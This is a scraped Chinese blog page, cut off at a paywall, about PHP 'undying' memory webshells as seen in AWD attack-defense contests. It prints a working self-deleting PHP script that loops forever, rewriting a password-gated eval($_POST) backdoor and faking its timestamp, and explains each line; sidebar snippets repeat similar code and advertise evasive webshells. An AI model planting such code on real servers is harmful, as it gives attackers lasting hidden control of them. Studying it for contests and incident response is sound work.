不死马php如何取证_不死马 - Unixcs - 博客园

最新推荐文章于 2023-08-01 20:23:00 发布
最新推荐文章于 2023-08-01 20:23:00 发布
阅读量309 收藏 1
点赞数
文章标签: 不死马php如何取证
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39805720/article/details/111760615
版权

什么是不死马?

内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。

生成过程

不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)

两种不死马

网上流传的不死马

ignore_user_abort(true);

set_time_limit(0);

unlink(__FILE__);

$file = '2.php';

$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';

while (1){

file_put_contents($file,$code);

system('touch -m -d "2018-12-01 09:10:12" .2.php');

usleep(5000);

}

?>

ignore_user_abort(true);

函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。

set_time_limit()

函数设置脚本最大执行时间。这里设置为0,即没有时间方面的限制。

unlink(__FILE__)

删除文件本身,以起到隐蔽自身的作用。

while

循环内每隔usleep(5000)即写新

最低0.47元/天 解锁文章
weixin_39805720
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
不死马php如何取证_不死马 - 高诺琪 - 博客园
weixin_39849671的博客
12-21 268
借鉴文章不死马常用于AWD模式,用于权限维持,首先上传一个不死马,然后访问该页面,就会执行不死马,它会以进程的形式运行,不断的生成文件,即使被发现也不容易被删掉,同时注意上传的目录是否有权限不死马ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。unlink(__FILE__); //删除自身whi...
php不死马如何kill,awd攻防之kill 不死马
weixin_33278577的博客
03-22 1681
1.pwn题目题目预设条件:官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口,并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成:sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注:后面的ga...
码之内存码
G653214的博客
11-16 1267
内存,通俗将就是不????,就是会运行一段时间不退出的程序常驻PHP进程里,无限循环。 生成过程: 不???? --> 上传到server --> server执行文件 --> server本地无线循环生成(一句话.php) 两种不????: 网上流传的不???? ignore_user_abort(true):函数设置与客户几断开是否会终止脚本的执行。这里设置位true则忽略与用户的断开,即使与客户机断开脚本仍会执行 set_time_limit():函数设置脚
不死马php如何取证_干掉 PHP 不死马
weixin_39880621的博客
01-30 843
在 AWD 模式下经常碰到不死马, 不干掉的话就会一直被偷 flag, 很难受. 所以研究一下怎么干掉.什么是不死马先说一下什么是不死马, 比如这种12345678910set_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = "";file_put_contents(".shell.php", $c...
关于PHP不死马的分析和总结
weixin_52501704的博客
10-16 1914
关于PHP不死马的分析和总结
不死马
最新发布
strider1123的博客
08-01 159
不死马感觉挺有用的,先了解了解,早晚会用到 先来了解下不死马“不”的原理 不死马与普通一句话的区别在于,不死马本身并不是用来连接的,而是创建一个不断生成另一个一句话的进程,我们需要连接的是另一个被创建出来的一句话木文件 来看一个普通的不死马 <?php set_time_limit(0); //用来让这个php文件能永久执行,否则会有...
Ubuntu18_04 VMwareTools安装方法 - Angel_Q - 博客园.htm
11-08
Ubuntu18_04 VMwareTools安装方法 - Angel_Q - 博客园.htm
SQL_Server_存储过程_-_hoojo_-_博客园
05-31
SQL_Server_存储过程_-_hoojo_-_博客园
VB6_0调用DLL - hanford - 博客园.htm
01-15
详细描述了在vb6中如何调用dll。
注入 - 代码注入之远程线程篇 - C_C++_Python_Java - 博客园.pdf
06-17
注入 - 代码注入之远程线程篇 - C_C++_Python_Java - 博客园.pdf
PHP加密无后门大
07-26
PHP加密无后门大
未加密免杀php.php
02-21
现在的后门里面都有内藏后门,会被黑吃黑,我分享的这个大全解密,不会被螳螂捕蝉黄雀在后。可以过一些nginx防火墙的后门查杀,防止被爆破密码,密码输错你指定的次数就拉黑ip段,后门登录需要账号和密码,非泛滥后门,珍藏未加密的webhsell 默认账号csdn 密码csdn
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
ssm+redis整合(通过cache方式) - L_O_V_E_Java - 博客园1
08-03
4. Re:常用webservice接口 2. JAVA的UDP协议交互信息(860) 3. android中的HttpURLConnection和Http 3
Php-不死马的权限维持
mingyqf的博客
02-18 686
转发自知乎: https://zhuanlan.zhihu.com/p/420615927 侵删 大家在渗透测试中,碰到java的程序,都会打上一个内存 但是在php的程序中很少有这种webshell/维持方式,/无主文件落地的方式 接下来就让小编带你聊聊,php不死马的权限维持,其实早在之前比较火 0x01 PHp - 不死马(内存) 在实战当中,现在很少有人用不死马了,其实可以有效的去用来做一些防护的绕过。也加大了一些溯源的难度,和宿主检测webshell的难度 第一种, 是把木通过写入的方
Windows权限维持之php不死马、映像劫持、策略组脚本
Longwaer
01-09 1263
通过学习掌握Windows权限维持手段,提升在个人知识小技巧,更快的知晓权限维持的作用性。
php 计算取证,PHP 的比较运算与逻辑运算详解
weixin_28721019的博客
03-13 131
1、以下值用 empty() 被判断为true:未赋值变量、未声明变量、0、"0"、""、false、null、空数组 array() 、对象的魔术方法 __get() 返回的值在低于 PHP5.0 的版本中,没有任何属性的对象也被 empty 判断为 true注意:empty() 只接受变量或变量的索引值或属性值,不能直接传入常量,也不能传入运算表达式,PHP 5.5 之后支持表达式2、被 is...
不死马php如何取证_php不死马如何删除
weixin_39669075的博客
12-21 398
什么是不死马?内存,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。生成过程 (推荐学习:PHP视频教程)不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)网上流传不死马...
php取整的几种方式
chamtianjiao的专栏
07-19 519
floor 舍去法取整 语法格式:float floor ( float value ) 返回不大于value 的下一个整数,将value 的小数部分舍去取整。floor() 返回的类型仍然是float,因为float 值的范围通常比integer 要大。 echo floor(4.3);   // 4 echo floor(9.999); // 9   ceil 进一法取整 语法格式:
iOS多线程技术方案 - Erma_Jack - 博客园1
08-04
iOS多线程技术方案 - Erma_Jack - 博客园1

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值